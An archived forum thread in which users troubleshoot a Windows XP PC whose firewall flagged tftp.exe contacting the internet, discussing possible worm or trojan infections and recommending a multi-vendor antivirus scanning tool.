tftp trying to access internet. Should it?

[H. S.]

Hello,

I have a friend who has Windows XP (updated) running on his PC and he
asked me today if a message by zone alarm was anything to worry about.
It reported that TFTP application was trying to access the internet. I
suggested he deny it for now. Is there any reason the trivial FTP should
be accessing a remote website from an XP machine?

I did a search on google and discovered that it could be an indication
of Nimda or Mblast virus. However, it looks as if these are not a
problem for fully updated XP Pro. machines. Any other possibilities or
explanations for this? Suggestions? Advice?

thanks,
->HS

 

[David H. Lipman]

From: "H. S." <[email protected]>

| Hello,

| I have a friend who has Windows XP (updated) running on his PC and he
| asked me today if a message by zone alarm was anything to worry about.
| It reported that TFTP application was trying to access the internet. I
| suggested he deny it for now. Is there any reason the trivial FTP should
| be accessing a remote website from an XP machine?

| I did a search on google and discovered that it could be an indication
| of Nimda or Mblast virus. However, it looks as if these are not a
| problem for fully updated XP Pro. machines. Any other possibilities or
| explanations for this? Suggestions? Advice?

| thanks,
->>HS


Download MULTI_AV.EXE from the URL --
http://www.ik-cs.com/programs/virtools/Multi_AV.exe

To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close

Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }

NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
FireWall to allow it to download the needed AV vendor related files.

C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
This will bring up the initial menu of choices and should be executed in Normal Mode.
This way all the components can be downloaded from each AV vendor's web site.
The choices are; Sophos, Trend, McAfee, Kaspersky, Exit this menu and Reboot the PC.

You can choose to go to each menu item and just download the needed files or you can
download the files and perform a scan in Normal Mode. Once you have downloaded the files
needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
during boot] and re-run the menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
file. http://www.ik-cs.com/multi-av.htm

Additional Instructions:
http://pcdid.com/Multi_AV.htm


* * * Please report back your results * * *

 

[H. S.]

David H. Lipman wrote:

* * * Please report back your results * * *

Thanks for the steps. But before I do this (the user is not comfortable
with these steps, I have to walk him through this or do this remotely),
I would still want to know if an updated XP Pro. is vulnerable to these
viruses.

->HS

 

[David H. Lipman]

From: "H. S." <[email protected]>


| Thanks for the steps. But before I do this (the user is not comfortable
| with these steps, I have to walk him through this or do this remotely),
| I would still want to know if an updated XP Pro. is vulnerable to these
| viruses.

Since we don't know what exactly is on the PC, I can't specifically approach the
Vulnerability issue.

All I can say is that malware is most likely using the TFTP.EXE utility of Windows to send
"stuff" home. It may be a Keylogging Trojan or it may be a worm. There is insufficient
information to come to a conclusion.

 

[H. S.]

From: "H. S." <[email protected]>


| Thanks for the steps. But before I do this (the user is not comfortable
| with these steps, I have to walk him through this or do this remotely),
| I would still want to know if an updated XP Pro. is vulnerable to these
| viruses.

Since we don't know what exactly is on the PC, I can't specifically approach the
Vulnerability issue.

All I can say is that malware is most likely using the TFTP.EXE utility of Windows to send
"stuff" home. It may be a Keylogging Trojan or it may be a worm. There is insufficient
information to come to a conclusion.

Fair enough.

One last question before I go all out on the possible rouge program in
the computer: is there any valid reason for the XP installation to use tftp?

By the way, the XP installation has XP Pro on it, regularly updated, IE
7, Firefox 2.0. Outlook is never used and neither is IE 7. There is no
MS office. There is yahoo messenger. MSN is never used. Skype is
installed. A typing tutor and vncviewer applications are installed. For
security, there is Zone Alarm and Norton antivirus Corp. Ed. 10.0 (also
updated). That is about it.

 

[David H. Lipman]

From: "H. S." <[email protected]>




| Fair enough.

| One last question before I go all out on the possible rouge program in
| the computer: is there any valid reason for the XP installation to use tftp?

| By the way, the XP installation has XP Pro on it, regularly updated, IE
| 7, Firefox 2.0. Outlook is never used and neither is IE 7. There is no
| MS office. There is yahoo messenger. MSN is never used. Skype is
| installed. A typing tutor and vncviewer applications are installed. For
| security, there is Zone Alarm and Norton antivirus Corp. Ed. 10.0 (also
| updated). That is about it.


Not the OS. Only a user.

For example, you may use the TFTP client to load a BIOS image on a Router or managed
Ethernet Switch.

There is NO reason the OS would use TFTP.EXE or the TFTP protocol withour a user requesting
its use. Thus, if you aren't specifically using it and it is running, the liklihood of
malicipus activity is very high.

 

[H.S.]

From: "H. S." <[email protected]>




| Fair enough.

| One last question before I go all out on the possible rouge program in
| the computer: is there any valid reason for the XP installation to use tftp?

| By the way, the XP installation has XP Pro on it, regularly updated, IE
| 7, Firefox 2.0. Outlook is never used and neither is IE 7. There is no
| MS office. There is yahoo messenger. MSN is never used. Skype is
| installed. A typing tutor and vncviewer applications are installed. For
| security, there is Zone Alarm and Norton antivirus Corp. Ed. 10.0 (also
| updated). That is about it.


Not the OS. Only a user.

For example, you may use the TFTP client to load a BIOS image on a Router or managed
Ethernet Switch.

There is NO reason the OS would use TFTP.EXE or the TFTP protocol withour a user requesting
its use. Thus, if you aren't specifically using it and it is running, the liklihood of
malicipus activity is very high.

Here is what I found:

1. Spbot did not find anything.
2. Symantec AV Corp Ed. did not find anything.
3. There are some tftp*.* files in C: like this:
C:\Program Files\Symantec AntiVirus\TFTP2920
C:\Program Files\Symantec AntiVirus\TFTP2928
C:\Program Files\Symantec AntiVirus\TFTP3524
C:\WINDOWS\system32\tftp.exe
C:\WINDOWS\system32\dllcache\tftp.exe

The files in Symantec folder are 0 bytes long. There were only 5 or so
attempts by tftp to contact some machine in the last week or so. I
checked for the welchia worm, but there is no tftp service running and
there is no w32svc or something in the WINDOWS directory.

Given the above, any chances of infection?

 

[Daave]

H. S. wrote in message:

I have a friend who has Windows XP (updated) running on his PC and he
asked me today if a message by zone alarm was anything to worry about.
It reported that TFTP application was trying to access the internet. I
suggested he deny it for now. Is there any reason the trivial FTP
should be accessing a remote website from an XP machine?

I did a search on google and discovered that it could be an indication
of Nimda or Mblast virus. However, it looks as if these are not a
problem for fully updated XP Pro. machines. Any other possibilities or
explanations for this? Suggestions? Advice?

Take a look at info on W32.Spybot.ACYR at
http://www.symantec.com/security_response/writeup.jsp?docid=2006-112810-5302-99&tabid=2

 

[H. S.]

Take a look at info on W32.Spybot.ACYR at
http://www.symantec.com/security_response/writeup.jsp?docid=2006-112810-5302-99&tabid=2

Yes, I did that last night but did not find the signatures of infection.
e.g. there was no %Windir%\w32svc.exe file.

 

[David H. Lipman]

From: "H.S." <[email protected]>

| Here is what I found:

| 1. Spbot did not find anything.
| 2. Symantec AV Corp Ed. did not find anything.
| 3. There are some tftp*.* files in C: like this:
| C:\Program Files\Symantec AntiVirus\TFTP2920
| C:\Program Files\Symantec AntiVirus\TFTP2928
| C:\Program Files\Symantec AntiVirus\TFTP3524
| C:\WINDOWS\system32\tftp.exe
| C:\WINDOWS\system32\dllcache\tftp.exe

| The files in Symantec folder are 0 bytes long. There were only 5 or so
| attempts by tftp to contact some machine in the last week or so. I
| checked for the welchia worm, but there is no tftp service running and
| there is no w32svc or something in the WINDOWS directory.

| Given the above, any chances of infection?


Still high. Albeit I'm miffed about the TFTP files in; C:\Program Files\Symantec AntiVirus

The Welchia is just one of numerous from tghe Mocbot to the SDBot.

http://www.sophos.com/support/knowl...s/?search=tftp&product_search=0&action=search


Please run the Multi AV Scanning Tool.